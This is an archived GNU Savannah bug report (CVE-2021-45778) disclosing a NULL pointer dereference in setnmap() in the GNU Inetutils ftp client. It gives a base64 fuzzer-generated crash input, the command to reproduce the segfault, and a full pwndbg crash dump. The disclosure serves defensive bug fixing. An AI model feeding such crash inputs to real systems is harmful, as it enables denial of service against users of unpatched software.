Headline
CVE-2021-45778: [bug #61723] NULL Pointer Dereference in setnmap() at cmds.c:2303
A NULL pointer dereference in setnmap() at cmds.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
From:
AiDai
Subject:
[bug #61723] NULL Pointer Dereference in setnmap() at cmds.c:2303
Date:
Thu, 23 Dec 2021 09:13:10 -0500 (EST)
User-agent:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
URL: https://savannah.gnu.org/bugs/?61723\
Summary: NULL Pointer Dereference in setnmap() at cmds.c:2303
Project: GNU Networking Utilities
Submitted by: aidai
Submitted on: Thu 23 Dec 2021 02:13:08 PM UTC
Category: None
Severity: 3 - Normal
Item Group: None
Status: None
Privacy: Public
Assigned to: None
Open/Closed: Open
Discussion Lock: Any
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Details:
NULL Pointer Dereference in setnmap() at cmds.c:2303
Description
A NULL Pointer Dereference was discovered in setnmap() at cmds.c:2303. The vulnerability causes a segmentation fault and application crash.
**version**
``` ./ftp --version ftp (GNU inetutils) 2.2.16-cf091 Copyright © 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later https://gnu.org/licenses/gpl.html\. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.
Written by many authors. ```
**System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
Proof of Concept
**poc**
``` base64 poc bm1hIBjyAoHzCcvLArnD/sreCvgmMwoKAPUKEBoKEAAKDgAAAIDn5+fn5wAABADn5+foA+f4FJ0r CgoKCgoK538Kubn/gAArCgp/CgoKCgoKQn8K1rn/gAAKCgp/CgoKAN0= ```
**command:**
``` ./ftp < ./poc ```
**Result**
``` ./ftp < ./poc [1] 728662 segmentation fault ./ftp < ./poc ```
**gdb**
``` Program received signal SIGSEGV, Segmentation fault. 0x000055555555ec9d in setnmap (argc=3, argv=0x55555557e680 <margv>) at cmds.c:2303 2303 *cp = '\0’; LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5555555702c0 (__libc_csu_init) ◂— endbr64 RCX 0x4 RDX 0x0 RDI 0x555555582aa0 ◂— 0x8102f21820616d6e RSI 0x20 R8 0x555555583620 ◂— 0x8102f21800616d6e /* ‘nma’ */ R9 0x7ffff7f5a010 (main_arena+1168) —▸ 0x7ffff7f5a000 (main_arena+1152) —▸ 0x7ffff7f59ff0 (main_arena+1136) —▸ 0x7ffff7f59fe0 (main_arena+1120) —▸ 0x7ffff7f59fd0 (main_arena+1104) ◂— … R10 0x555555580010 ◂— 0x0 R11 0x7ffff7f59be0 (main_arena+96) —▸ 0x5555555851a0 ◂— 0x0 R12 0x555555559f30 (_start) ◂— endbr64 R13 0x7fffffffe210 ◂— 0x1 R14 0x0 R15 0x0 RBP 0x7fffffffe060 —▸ 0x7fffffffe0a0 —▸ 0x7fffffffe120 ◂— 0x0 RSP 0x7fffffffe040 —▸ 0x55555557e680 (margv) —▸ 0x555555583620 ◂— 0x8102f21800616d6e /* ‘nma’ */ RIP 0x55555555ec9d (setnmap+258) ◂— mov byte ptr [rax], 0 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x55555555ec9d <setnmap+258> mov byte ptr [rax], 0 0x55555555eca0 <setnmap+261> mov rax, qword ptr [rip + 0x1ae49] <0x555555579af0> 0x55555555eca7 <setnmap+268> mov rdi, rax 0x55555555ecaa <setnmap+271> call rpl_free <rpl_free>
0x55555555ecaf <setnmap+276> mov rax, qword ptr [rip + 0x1f98a]
<0x55555557e640>
0x55555555ecb6 <setnmap+283> mov rdi, rax
0x55555555ecb9 <setnmap+286> call strdup@plt
strdup@plt
0x55555555ecbe <setnmap+291> mov qword ptr [rip + 0x1ae2b], rax
<0x555555579af0>
0x55555555ecc5 <setnmap+298> jmp setnmap+301
<setnmap+301>
0x55555555ecc7 <setnmap+300> nop 0x55555555ecc8 <setnmap+301> add qword ptr [rbp - 8], 1 ──────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────── In file: /root/disk2/fuzzing/inetutils/inetutils/ftp/cmds.c 2298 while (*++cp == ' ') 2299 continue; 2300 altarg = cp; 2301 cp = strchr (altarg, ' '); 2302 } ► 2303 *cp = '\0’; 2304 2305 free (mapin); 2306 mapin = strdup (altarg); 2307 2308 while (*++cp == ' ') ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffe040 —▸ 0x55555557e680 (margv) —▸ 0x555555583620 ◂— 0x8102f21800616d6e /* ‘nma’ */ 01:0008│ 0x7fffffffe048 ◂— 0x355583620 02:0010│ 0x7fffffffe050 —▸ 0x5555555796c0 (cmdtab+2464) ◂— 0x0 03:0018│ 0x7fffffffe058 ◂— 0x0 04:0020│ rbp 0x7fffffffe060 —▸ 0x7fffffffe0a0 —▸ 0x7fffffffe120 ◂— 0x0 05:0028│ 0x7fffffffe068 —▸ 0x555555566a09 (cmdscanner+633) ◂— mov eax, dword ptr [rip + 0x17bf5] 06:0030│ 0x7fffffffe070 ◂— 0x0 07:0038│ 0x7fffffffe078 ◂— 0x1c54c7100 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x55555555ec9d setnmap+258 f 1 0x555555566a09 cmdscanner+633 f 2 0x55555556665a main+929 f 3 0x7ffff7d950b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x000055555555ec9d in setnmap (argc=3, argv=0x55555557e680 <margv>) at cmds.c:2303 #1 0x0000555555566a09 in cmdscanner (top=1) at main.c:461 #2 0x000055555556665a in main (argc=0, argv=0x7fffffffe220) at main.c:310 #3 0x00007ffff7d950b3 in __libc_start_main (main=0x5555555662b9 <main>, argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at …/csu/libc-start.c:308 #4 0x0000555555559f5e in _start () ```
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Reply to this item at:
https://savannah.gnu.org/bugs/?61723\
_______________________________________________ Message sent via Savannah https://savannah.gnu.org/
[Prev in Thread]
Current Thread
[Next in Thread]
[bug #61723] NULL Pointer Dereference in setnmap() at cmds.c:2303, AiDai <=
Prev by Date: [bug #61722] Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186
Next by Date: [bug #61724] Infinite Loop in domacro at domacro.c:258
Previous by thread: [bug #61722] Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186
Next by thread: [bug #61724] Infinite Loop in domacro at domacro.c:258
Index(es):
- Date
- Thread